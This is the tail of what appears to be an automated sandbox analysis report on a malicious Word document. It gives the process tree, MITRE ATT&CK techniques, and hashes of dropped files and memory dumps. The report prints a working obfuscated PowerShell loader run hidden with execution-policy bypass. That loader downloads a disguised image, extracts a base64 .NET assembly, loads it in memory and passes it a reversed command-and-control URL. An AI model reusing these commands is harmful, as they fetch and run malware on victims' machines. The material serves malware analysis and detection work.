⇫HI┗ ䷡ ⽨ ▝ ⇫aQBu┗ ䷡ ⽨ ▝ ⇫Gc┗ ䷡ ⽨ ▝ ⇫K┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫k┗ ䷡ ⽨ ▝ ⇫HM┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫Bh┗ ䷡ ⽨ ▝ ⇫HI┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫BJ┗ ䷡ ⽨ ▝ ⇫G4┗ ䷡ ⽨ ▝ ⇫Z┗ ䷡ ⽨ ▝ ⇫Bl┗ ䷡ ⽨ ▝ ⇫Hg┗ ䷡ ⽨ ▝ ⇫L┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫g┗ ䷡ ⽨ ▝ ⇫CQ┗ ䷡ ⽨ ▝ ⇫YgBh┗ ䷡ ⽨ ▝ ⇫HM┗ ䷡ ⽨ ▝ ⇫ZQ┗ ䷡ ⽨ ▝ ⇫2┗ ䷡ ⽨ ▝ ⇫DQ┗ ䷡ ⽨ ▝ ⇫T┗ ䷡ ⽨ ▝ ⇫Bl┗ ䷡ ⽨ ▝ ⇫G4┗ ䷡ ⽨ ▝ ⇫ZwB0┗ ䷡ ⽨ ▝ ⇫Gg┗ ䷡ ⽨ ▝ ⇫KQ┗ ䷡ ⽨ ▝ ⇫7┗ ䷡ ⽨ ▝ ⇫CQ┗ ䷡ ⽨ ▝ ⇫YwBv┗ ䷡ ⽨ ▝ ⇫G0┗ ䷡ ⽨ ▝ ⇫bQBh┗ ䷡ ⽨ ▝ ⇫G4┗ ䷡ ⽨ ▝ ⇫Z┗ ䷡ ⽨ ▝ ⇫BC┗ ䷡ ⽨ ▝ ⇫Hk┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫Bl┗ ䷡ ⽨ ▝ ⇫HM┗ ䷡ ⽨ ▝ ⇫I┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫9┗ ䷡ ⽨ ▝ ⇫C┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫WwBT┗ ䷡ ⽨ ▝ ⇫Hk┗ ䷡ ⽨ ▝ ⇫cwB0┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫bQ┗ ䷡ ⽨ ▝ ⇫u┗ ䷡ ⽨ ▝ ⇫EM┗ ䷡ ⽨ ▝ ⇫bwBu┗ ䷡ ⽨ ▝ ⇫HY┗ ䷡ ⽨ ▝ ⇫ZQBy┗ ䷡ ⽨ ▝ ⇫HQ┗ ䷡ ⽨ ▝ ⇫XQ┗ ䷡ ⽨ ▝ ⇫6┗ ䷡ ⽨ ▝ ⇫Do┗ ䷡ ⽨ ▝ ⇫RgBy┗ ䷡ ⽨ ▝ ⇫G8┗ ䷡ ⽨ ▝ ⇫bQBC┗ ䷡ ⽨ ▝ ⇫GE┗ ䷡ ⽨ ▝ ⇫cwBl┗ ䷡ ⽨ ▝ ⇫DY┗ ䷡ ⽨ ▝ ⇫N┗ ䷡ ⽨ ▝ ⇫BT┗ ䷡ ⽨ ▝ ⇫HQ┗ ䷡ ⽨ ▝ ⇫cgBp┗ ䷡ ⽨ ▝ ⇫G4┗ ䷡ ⽨ ▝ ⇫Zw┗ ䷡ ⽨ ▝ ⇫o┗ ䷡ ⽨ ▝ ⇫CQ┗ ䷡ ⽨ ▝ ⇫YgBh┗ ䷡ ⽨ ▝ ⇫HM┗ ䷡ ⽨ ▝ ⇫ZQ┗ ䷡ ⽨ ▝ ⇫2┗ ䷡ ⽨ ▝ ⇫DQ┗ ䷡ ⽨ ▝ ⇫QwBv┗ ䷡ ⽨ ▝ ⇫G0┗ ䷡ ⽨ ▝ ⇫bQBh┗ ䷡ ⽨ ▝ ⇫G4┗ ䷡ ⽨ ▝ ⇫Z┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫p┗ ䷡ ⽨ ▝ ⇫Ds┗ ䷡ ⽨ ▝ ⇫J┗ ䷡ ⽨ ▝ ⇫Bs┗ ䷡ ⽨ ▝ ⇫G8┗ ䷡ ⽨ ▝ ⇫YQBk┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫Z┗ ䷡ ⽨ ▝ ⇫BB┗ ䷡ ⽨ ▝ ⇫HM┗ ䷡ ⽨ ▝ ⇫cwBl┗ ䷡ ⽨ ▝ ⇫G0┗ ䷡ ⽨ ▝ ⇫YgBs┗ ䷡ ⽨ ▝ ⇫Hk┗ ䷡ ⽨ ▝ ⇫I┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫9┗ ䷡ ⽨ ▝ ⇫C┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫WwBT┗ ䷡ ⽨ ▝ ⇫Hk┗ ䷡ ⽨ ▝ ⇫cwB0┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫bQ┗ ䷡ ⽨ ▝ ⇫u┗ ䷡ ⽨ ▝ ⇫FI┗ ䷡ ⽨ ▝ ⇫ZQBm┗ ䷡ ⽨ ▝ ⇫Gw┗ ䷡ ⽨ ▝ ⇫ZQBj┗ ䷡ ⽨ ▝ ⇫HQ┗ ䷡ ⽨ ▝ ⇫aQBv┗ ䷡ ⽨ ▝ ⇫G4┗ ䷡ ⽨ ▝ ⇫LgBB┗ ䷡ ⽨ ▝ ⇫HM┗ ䷡ ⽨ ▝ ⇫cwBl┗ ䷡ ⽨ ▝ ⇫G0┗ ䷡ ⽨ ▝ ⇫YgBs┗ ䷡ ⽨ ▝ ⇫Hk┗ ䷡ ⽨ ▝ ⇫XQ┗ ䷡ ⽨ ▝ ⇫6┗ ䷡ ⽨ ▝ ⇫Do┗ ䷡ ⽨ ▝ ⇫T┗ ䷡ ⽨ ▝ ⇫Bv┗ ䷡ ⽨ ▝ ⇫GE┗ ䷡ ⽨ ▝ ⇫Z┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫o┗ ䷡ ⽨ ▝ ⇫CQ┗ ䷡ ⽨ ▝ ⇫YwBv┗ ䷡ ⽨ ▝ ⇫G0┗ ䷡ ⽨ ▝ ⇫bQBh┗ ䷡ ⽨ ▝ ⇫G4┗ ䷡ ⽨ ▝ ⇫Z┗ ䷡ ⽨ ▝ ⇫BC┗ ䷡ ⽨ ▝ ⇫Hk┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫Bl┗ ䷡ ⽨ ▝ ⇫HM┗ ䷡ ⽨ ▝ ⇫KQ┗ ䷡ ⽨ ▝ ⇫7┗ ䷡ ⽨ ▝ ⇫CQ┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫B5┗ ䷡ ⽨ ▝ ⇫H┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫ZQ┗ ䷡ ⽨ ▝ ⇫g┗ ䷡ ⽨ ▝ ⇫D0┗ ䷡ ⽨ ▝ ⇫I┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫k┗ ䷡ ⽨ ▝ ⇫Gw┗ ䷡ ⽨ ▝ ⇫bwBh┗ ䷡ ⽨ ▝ ⇫GQ┗ ䷡ ⽨ ▝ ⇫ZQBk┗ ䷡ ⽨ ▝ ⇫EE┗ ䷡ ⽨ ▝ ⇫cwBz┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫bQBi┗ ䷡ ⽨ ▝ ⇫Gw┗ ䷡ ⽨ ▝ ⇫eQ┗ ䷡ ⽨ ▝ ⇫u┗ ䷡ ⽨ ▝ ⇫Ec┗ ䷡ ⽨ ▝ ⇫ZQB0┗ ䷡ ⽨ ▝ ⇫FQ┗ ䷡ ⽨ ▝ ⇫eQBw┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫K┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫n┗ ䷡ ⽨ ▝ ⇫GQ┗ ䷡ ⽨ ▝ ⇫bgBs┗ ䷡ ⽨ ▝ ⇫Gk┗ ䷡ ⽨ ▝ ⇫Yg┗ ䷡ ⽨ ▝ ⇫u┗ ䷡ ⽨ ▝ ⇫Ek┗ ䷡ ⽨ ▝ ⇫Tw┗ ䷡ ⽨ ▝ ⇫u┗ ䷡ ⽨ ▝ ⇫Eg┗ ䷡ ⽨ ▝ ⇫bwBt┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫Jw┗ ䷡ ⽨ ▝ ⇫p┗ ䷡ ⽨ ▝ ⇫Ds┗ ䷡ ⽨ ▝ ⇫J┗ ䷡ ⽨ ▝ ⇫Bt┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫Bo┗ ䷡ ⽨ ▝ ⇫G8┗ ䷡ ⽨ ▝ ⇫Z┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫g┗ ䷡ ⽨ ▝ ⇫D0┗ ䷡ ⽨ ▝ ⇫I┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫k┗ ䷡ ⽨ ▝ ⇫HQ┗ ䷡ ⽨ ▝ ⇫eQBw┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫LgBH┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫BN┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫Bo┗ ䷡ ⽨ ▝ ⇫G8┗ ䷡ ⽨ ▝ ⇫Z┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫o┗ ䷡ ⽨ ▝ ⇫Cc┗ ䷡ ⽨ ▝ ⇫VgBB┗ ䷡ ⽨ ▝ ⇫Ek┗ ䷡ ⽨ ▝ ⇫Jw┗ ䷡ ⽨ ▝ ⇫p┗ ䷡ ⽨ ▝ ⇫C4┗ ䷡ ⽨ ▝ ⇫SQBu┗ ䷡ ⽨ ▝ ⇫HY┗ ䷡ ⽨ ▝ ⇫bwBr┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫K┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫k┗ ䷡ ⽨ ▝ ⇫G4┗ ䷡ ⽨ ▝ ⇫dQBs┗ ䷡ ⽨ ▝ ⇫Gw┗ ䷡ ⽨ ▝ ⇫L┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫g┗ ䷡ ⽨ ▝ ⇫Fs┗ ䷡ ⽨ ▝ ⇫bwBi┗ ䷡ ⽨ ▝ ⇫Go┗ ䷡ ⽨ ▝ ⇫ZQBj┗ ䷡ ⽨ ▝ ⇫HQ┗ ䷡ ⽨ ▝ ⇫WwBd┗ ䷡ ⽨ ▝ ⇫F0┗ ䷡ ⽨ ▝ ⇫I┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫o┗ ䷡ ⽨ ▝ ⇫Cc┗ ䷡ ⽨ ▝ ⇫d┗ ䷡ ⽨ ▝ ⇫B4┗ ䷡ ⽨ ▝ ⇫HQ┗ ䷡ ⽨ ▝ ⇫LgBT┗ ䷡ ⽨ ▝ ⇫Fo┗ ䷡ ⽨ ▝ ⇫TQBI┗ ䷡ ⽨ ▝ ⇫C8┗ ䷡ ⽨ ▝ ⇫NQ┗ ䷡ ⽨ ▝ ⇫y┗ ䷡ ⽨ ▝ ⇫DI┗ ䷡ ⽨ ▝ ⇫Lw┗ ䷡ ⽨ ▝ ⇫w┗ ䷡ ⽨ ▝ ⇫DU┗ ䷡ ⽨ ▝ ⇫Lg┗ ䷡ ⽨ ▝ ⇫5┗ ䷡ ⽨ ▝ ⇫Dg┗ ䷡ ⽨ ▝ ⇫Lg┗ ䷡ ⽨ ▝ ⇫w┗ ䷡ ⽨ ▝ ⇫Dk┗ ䷡ ⽨ ▝ ⇫Lg┗ ䷡ ⽨ ▝ ⇫1┗ ䷡ ⽨ ▝ ⇫DQ┗ ䷡ ⽨ ▝ ⇫Lw┗ ䷡ ⽨ ▝ ⇫v┗ ䷡ ⽨ ▝ ⇫Do┗ ䷡ ⽨ ▝ ⇫c┗ ䷡ ⽨ ▝ ⇫B0┗ ䷡ ⽨ ▝ ⇫HQ┗ ䷡ ⽨ ▝ ⇫a┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫n┗ ䷡ ⽨ ▝ ⇫C┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫L┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫g┗ ䷡ ⽨ ▝ ⇫Cc┗ ䷡ ⽨ ▝ ⇫Z┗ ䷡ ⽨ ▝ ⇫Bl┗ ䷡ ⽨ ▝ ⇫HM┗ ䷡ ⽨ ▝ ⇫YQB0┗ ䷡ ⽨ ▝ ⇫Gk┗ ䷡ ⽨ ▝ ⇫dgBh┗ ䷡ ⽨ ▝ ⇫GQ┗ ䷡ ⽨ ▝ ⇫bw┗ ䷡ ⽨ ▝ ⇫n┗ ䷡ ⽨ ▝ ⇫C┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫L┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫g┗ ䷡ ⽨ ▝ ⇫Cc┗ ䷡ ⽨ ▝ ⇫Z┗ ䷡ ⽨ ▝ ⇫Bl┗ ䷡ ⽨ ▝ ⇫HM┗ ䷡ ⽨ ▝ ⇫YQB0┗ ䷡ ⽨ ▝ ⇫Gk┗ ䷡ ⽨ ▝ ⇫dgBh┗ ䷡ ⽨ ▝ ⇫GQ┗ ䷡ ⽨ ▝ ⇫bw┗ ䷡ ⽨ ▝ ⇫n┗ ䷡ ⽨ ▝ ⇫C┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫L┗ ䷡ ⽨ ▝ ⇫┗ ䷡ ⽨ ▝ ⇫g┗ ䷡ ⽨ ▝ ⇫Cc┗ ䷡ ⽨ ▝ ⇫Z┗ ䷡ ⽨ ▝ ⇫Bl┗ ䷡ ⽨ ▝ ⇫HM┗ ䷡ ⽨ ▝ ⇫YQB0┗ ䷡ ⽨ ▝ ⇫Gk┗ ䷡ ⽨ ▝ ⇫dgBh┗ ䷡ ⽨ ▝ ⇫GQ┗ ䷡ ⽨ ▝ ⇫bw┗ ䷡ ⽨ ▝ ⇫n┗ ䷡ ⽨ ▝ ⇫Cw┗ ䷡ ⽨ ▝ ⇫JwBS┗ ䷡ ⽨ ▝ ⇫GU┗ ䷡ ⽨ ▝ ⇫ZwBB┗ ䷡ ⽨ ▝ ⇫HM┗ ䷡ ⽨ ▝ ⇫bQ┗ ䷡ ⽨ ▝ ⇫n┗ ䷡ ⽨ ▝ ⇫Cw┗ ䷡ ⽨ ▝ ⇫Jw┗ ䷡ ⽨ ▝ ⇫n┗ ䷡ ⽨ ▝ ⇫Ck┗ ䷡ ⽨ ▝ ⇫KQ┗ ䷡ ⽨ ▝ ⇫=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('┗ ䷡ ⽨ ▝ ⇫','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2176
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SZMH/522/05.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
4d08b758c534f214c90f2cd85382a529

SHA1
21221ea6376d03f13b827a92a474d13ec30963a5

SHA256
6955159c1dc3b030338c0cccd01124318ab16ac7b5b81ccae9d9dc9dfd423a4e

SHA512
471fe110307af0e274cf83a31882a2c4175b65d81a0a871f8336f5112616edccd685e6fdb980ec0d749edd98f1c8f11fd1faf66e618e439bc6f2d0d98c59464a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
adfcccf6d3fea7fdd74e632c56efdebb

SHA1
6d03661fbe3e9405ea28fb46996ab5b93fab200b

SHA256
23355d06b29898fa8861008b13b1f16f2fde06177200d726229979f7e2798f1e

SHA512
09a0795a01e547b7538a0bcdf1bbd147ee72e52d51ffc8fea29b78bac3e8bd1408b2ce93b455f5ee9a72b2751b9abdad4ca88e0ddd097d2c2c4f41c5f3a38f72

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
b1d6ac484bdac199b8724ce7997fde78

SHA1
8c0803c352235ce9cd0693454eafdd2547ae1afc

SHA256
c55e17f0420078e37d202a4b964932031591f4ade8625805d2d471bf43360cf7

SHA512
684714a3026526f86e258ac256bb2f9674a29a679b38057ed1083685a613e0a5d20fc56ab5e74f5d57746be4d4f05b1f878e2cba89993d6b03fa077dc0064183

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{A1511AAA-A316-4E5F-BD6E-956A75124145}.FSD

Filesize
128KB

MD5
e95a397f35e1c8c94e9dfb3ad01f5a69

SHA1
44cac3e156e0031d743e275e278918c72fb537c0

SHA256
18a0bc39dea0b9ec5b57b8e0f4a201dbe01df18d0cb7bd1f05d3346bea9352bc

SHA512
f87f7a53ea1e362e31e2d08899ff3856558670ce81f45e1994229acad5dea0b8e8c7dc108f5dae6fc63fa8986afeb09e9fa057e9586dc0ad2a56e2fe933ab65c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
8185e9450c1f9e3f76ea0194bcb7a414

SHA1
2b5219292b21f33378aa0b2b1ffaea8dc1c1cb7d

SHA256
9a53727ca876da86fa5127e5aab9cd025f9ae70ed5575d7eec309f30f461c10b

SHA512
c761fb9e3bce109487b00873fdb014a8a62c177c85e0a43dd14b7becca9b6094c53a76df0b9cfecc052b1d9635424312a93e81503edd5459b381a942a7328175

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{1FBE0178-841B-4B12-B98A-76AEA71826C0}.FSD

Filesize
128KB

MD5
895a79bc9051d81955b0a52dd4afb993

SHA1
fd6e2d078fe417d418800fca8787f3aa18306b27

SHA256
15992bb5683113caf1bad592aa3a0a7eefbf9161c93637032ed59279b083a81f

SHA512
ef6b8d47b3f49fccded1c03012da547e4bd1ab5e19f9b1f122211957dadded1954587a45d0a7c593892e3dffabaa242342ce7d744fa347acaf617d299f7c3dc2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z2D3H3V6\mewithentirethingstogetmebackwithnewthingsreadyforbutterbunsmoothslikeyburnforeatingwithgirlsfriendwho_______yummybuttersmoothbun[1].doc

Filesize
91KB

MD5
28d95412db3a011684784953657efd12

SHA1
0a3734ee93c07b5f7c78766af2af63bb75984856

SHA256
c66193934887bee3b03867ec20b6aa7448d5f38b2d82d122a0cd442676d87866

SHA512
74642d41efa0a87e72086e210645b1aaed04fb8cdb918c38410cbcfa3d618b58eae2b9d04658431ac240fbf70e3ba8ae4abc15501dd146f5e759c3e090cea2d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab3969.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\{ABC68071-6259-4540-A10F-2DFCF50D2C1F}

Filesize
128KB

MD5
f1b4da39accd01f3ce5c0da95ba87644

SHA1
ee5e1df79730631bdb21a3cf83d85581c214d4cd

SHA256
7bc97d1681cde0e48ddec53e22aa4b9a4787b1d0e865e74fd823eb7a368bed85

SHA512
7a702318b7f17642d93d2313c1dedd884f5652c4584b6fffc23898d8961b37d923c22cf11580feb3632c67b0d9315c22c2c74bff98186678bb55b02cf6c518a7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
c6677843512757bc1f1f540c1d8540c3

SHA1
99b967ac9e8ad4b9ff8411e9b977b65981183ef8

SHA256
9663e51812f913d47ec5e7dd1a8b3da2da90425cd1f624321cde9e85b4356dd1

SHA512
69b5f90a3d0324616901c24618c044b02d94a8a58910b3668189f59890c93673cfd92c19dbb823800a16175c270db413c8e20be0035139233478758f9a77738d

Download Submit
C:\Users\Admin\AppData\Roaming\creatednewbuttersmoothbuno.vBS

Filesize
178KB

MD5
c2814bb5520c93ea6cdb72342daefc88

SHA1
f4fb00c5c56fe51a49f40a991022893e46090e06

SHA256
4b59f905d11ce9e815ccf05aa68c7c09ace2a030c14620594e6d3a774f9f36cd

SHA512
2630567eb32db56900d1dcc01f336f01630bc2b1e85df1177d98cabe756800f534a098792d22a118eb84b88003e9f9ae3f249a15ed956d2954dfee6f7b387992

Download Submit
memory/2564-21-0x000000007270D000-0x0000000072718000-memory.dmp

Filesize
44KB

Download
memory/2564-19-0x000000002F621000-0x000000002F622000-memory.dmp

Filesize
4KB

Download
memory/2564-23-0x0000000003EB0000-0x0000000003EB2000-memory.dmp

Filesize
8KB

Download
memory/2564-125-0x000000007270D000-0x0000000072718000-memory.dmp

Filesize
44KB

Download
memory/2564-139-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2564-140-0x000000007270D000-0x0000000072718000-memory.dmp

Filesize
44KB

Download
memory/2652-1-0x000000007270D000-0x0000000072718000-memory.dmp

Filesize
44KB

Download
memory/2652-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2652-24-0x0000000002450000-0x0000000002452000-memory.dmp

Filesize
8KB

Download
memory/2652-124-0x000000007270D000-0x0000000072718000-memory.dmp

Filesize
44KB

Download